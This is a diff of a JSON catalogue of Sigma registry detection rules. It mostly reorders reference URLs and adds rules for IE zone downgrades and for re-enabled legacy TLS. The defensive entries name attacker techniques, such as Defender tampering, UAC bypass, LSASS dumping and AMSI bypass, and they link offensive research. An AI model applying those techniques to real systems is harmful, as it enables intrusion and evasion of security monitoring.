"https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html", + "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", + "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", + "https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html", + "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_tampering.yml" ], "tags": [ @@ -19648,9 +19921,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml" ], "tags": [ @@ -19684,9 +19957,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml" ], "tags": [ @@ -19752,8 +20025,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/", "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53", + "https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" ], "tags": [ @@ -19938,8 +20211,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/", "https://admx.help/?Category=InternetExplorer&Policy=Microsoft.Policies.InternetExplorer::NoFirstRunCustomise", + "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/", "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_internet_explorer_disable_first_run_customize.yml" ], @@ -20020,9 +20293,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/win32/api/winevt/", - "https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/", "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", + "https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/", + "https://learn.microsoft.com/en-us/windows/win32/api/winevt/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml" ], "tags": [ @@ -20056,9 +20329,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml" ], "tags": [ @@ -20091,10 +20364,10 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.trendmicro.com/en_us/research/23/e/void-rabisu-s-use-of-romcom-backdoor-shows-a-growing-shift-in-th.html", - "https://strontic.github.io/xcyclopedia/library/clsid_C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6.html", "https://www.virustotal.com/gui/file/6d3ab9e729bb03ae8ae3fcd824474c5052a165de6cb4c27334969a542c7b261d/detection", "https://blogs.blackberry.com/en/2023/06/romcom-resurfaces-targeting-ukraine", + "https://www.trendmicro.com/en_us/research/23/e/void-rabisu-s-use-of-romcom-backdoor-shows-a-growing-shift-in-th.html", + "https://strontic.github.io/xcyclopedia/library/clsid_C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_comhijack_psfactorybuffer.yml" ], "tags": [ @@ -20262,6 +20535,32 @@ "uuid": "fdbf0b9d-0182-4c43-893b-a1eaab92d085", "value": "Potential Persistence Via Custom Protocol Handler" }, + { + "description": "Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the \"HTTP\" and \"HTTPS\" protocols to point to the \"My Computer\" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.\n", + "meta": { + "author": "Nasreddine Bencherchali (Nextron Systems), Michael Haag (idea)", + "creation_date": "2023/09/05", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_ie_security_zone_protocol_defaults_downgrade.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/JAMESWT_MHT/status/1699042827261391247", + "https://twitter.com/M_haggis/status/1699056847154725107", + "https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries", + "https://www.virustotal.com/gui/file/339ff720c74dc44265b917b6d3e3ba0411d61f3cd3c328e9a2bae81592c8a6e5/content", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ie_security_zone_protocol_defaults_downgrade.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "3fd4c8d7-8362-4557-a8e6-83b29cc0d724", + "value": "IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols" + }, { "description": "Attempts to detect system changes made by Blue Mockingbird", "meta": { @@ -20303,6 +20602,29 @@ "uuid": "92b0b372-a939-44ed-a11b-5136cf680e27", "value": "Blue Mockingbird - Registry" }, + { + "description": "Detects applications or users re-enabling old TLS versions by setting the \"Enabled\" value to \"1\" for the \"Protocols\" registry key.", + "meta": { + "author": "Nasreddine Bencherchali (Nextron Systems)", + "creation_date": "2023/09/05", + "falsepositive": [ + "Legitimate enabling of the old tls versions due to incompatibility" + ], + "filename": "registry_set_tls_protocol_old_version_enabled.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://techcommunity.microsoft.com/t5/windows-it-pro-blog/tls-1-0-and-tls-1-1-soon-to-be-disabled-in-windows/ba-p/3887947", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_tls_protocol_old_version_enabled.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "439957a7-ad86-4a8f-9705-a28131c6821b", + "value": "Old TLS1.0/TLS1.1 Protocol Version Enabled" + }, { "description": "Detect the creation of a service with a service binary located in a uncommon directory", "meta": { @@ -20382,13 +20704,13 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html", "https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", "https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html", - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", "https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting", + "https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_windows_defender_tamper.yml" ], "tags": [ @@ -20421,8 +20743,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70", "https://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us", + "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_outlook_homepage.yml" ], "tags": [ @@ -20455,8 +20777,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store", "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml" ], "tags": [ @@ -20522,8 +20844,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/", "https://github.com/hfiref0x/UACME", + "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml" ], "tags": [ @@ -20558,8 +20880,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/", "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53", + "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_enable_macro_execution.yml" ], "tags": [ @@ -20609,9 +20931,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://twitter.com/inversecos/status/1494174785621819397", - "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/", + "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/", + "https://twitter.com/inversecos/status/1494174785621819397", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_access_vbom_tamper.yml" ], "tags": [ @@ -20701,9 +21023,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", "https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/", "https://www.blackhat.com/docs/asia-14/materials/Erickson/Asia-14-Erickson-Persist-It-Using-And-Abusing-Microsofts-Fix-It-Patches.pdf", + "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_shim_database_uncommon_location.yml" ], "tags": [ @@ -20902,8 +21224,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone", "https://docs.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_security_zones.yml" ], "tags": [ @@ -21030,9 +21352,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml" ], "tags": [ @@ -21065,8 +21387,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://persistence-info.github.io/Data/mpnotify.html", "https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek", + "https://persistence-info.github.io/Data/mpnotify.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_mpnotify.yml" ], "tags": [ @@ -21090,9 +21412,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml" ], "tags": [ @@ -21216,9 +21538,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml" ], "tags": [ @@ -21251,8 +21573,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx", "https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md", + "https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsa_disablerestrictedadmin.yml" ], "tags": [ @@ -21285,9 +21607,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/deepinstinct/Lsass-Shtinkering", - "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps", + "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", + "https://github.com/deepinstinct/Lsass-Shtinkering", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsass_usermode_dumping.yml" ], "tags": [ @@ -21320,9 +21642,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", + "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dhcp_calloutdll.yml" ], "tags": [ @@ -21364,9 +21686,9 @@ "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://admx.help/HKCU/software/policies/microsoft/office/16.0/excel/security/protectedview", "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/", + "https://admx.help/HKCU/software/policies/microsoft/office/16.0/excel/security/protectedview", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_disable_protected_view_features.yml" ], "tags": [ @@ -21433,8 +21755,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", "https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/", + "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_shim_database.yml" ], @@ -21504,8 +21826,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_ie.yml" ], "tags": [ @@ -21569,9 +21891,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ + "https://www.sans.org/cyber-security-summit/archives", "https://twitter.com/jamieantisocial/status/1304520651248668673", "https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors", - "https://www.sans.org/cyber-security-summit/archives", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml" ], "tags": [ @@ -21799,8 +22121,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137/T1137.md", + "https://docs.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_security_settings.yml" ], "tags": [ @@ -21866,9 +22188,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://twitter.com/inversecos/status/1494174785621819397", - "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/", + "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/", + "https://twitter.com/inversecos/status/1494174785621819397", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_vba_warnings_tamper.yml" ], "tags": [ @@ -21901,8 +22223,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://persistence-info.github.io/Data/lsaaextension.html", "https://twitter.com/0gtweet/status/1476286368385019906", + "https://persistence-info.github.io/Data/lsaaextension.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_lsa_extension.yml" ], "tags": [ @@ -22063,8 +22385,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_defender_service.yml" ], "tags": [ @@ -22165,8 +22487,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/", "https://persistence-info.github.io/Data/autodialdll.html", + "https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_autodial_dll.yml" ], "tags": [ @@ -22223,8 +22545,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650", "https://youtu.be/zSihR3lTf7g", + "https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml" ], "tags": [ @@ -22258,10 +22580,10 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml" ], "tags": [ @@ -22327,9 +22649,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-1---modify-registry-of-current-user-profile---cmd", "https://unit42.paloaltonetworks.com/ransomware-families/", + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hidden_extention.yml" ], "tags": [ @@ -22360,8 +22682,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", + "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_adwind.yml" ], "tags": [ @@ -22504,9 +22826,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba", - "https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/", "https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope", + "https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/", + "https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_macroruntimescanscope.yml" ], "tags": [ @@ -22529,10 +22851,10 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html", - "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode", "https://github.com/elastic/detection-rules/issues/1371", "https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS", + "https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html", + "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_over_https_enabled.yml" ], "tags": [ @@ -22573,8 +22895,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/", "https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html", + "https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_reflectdebugger.yml" ], "tags": [ @@ -22640,10 +22962,10 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1112/T1112.md", - "https://twitter.com/nas_bench/status/1626648985824788480", "https://www.hexacorn.com/blog/2019/02/15/beyond-good-ol-run-key-part-103/", "https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.InternetCommunicationManagement::EventViewer_DisableLinks", + "https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1112/T1112.md", + "https://twitter.com/nas_bench/status/1626648985824788480", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml" ], "tags": [ @@ -22710,9 +23032,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", "https://twitter.com/MichalKoczwara/status/1553634816016498688", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml" ], "tags": [ @@ -22735,17 +23057,17 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", - "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", - "https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/", - "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", - "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", - 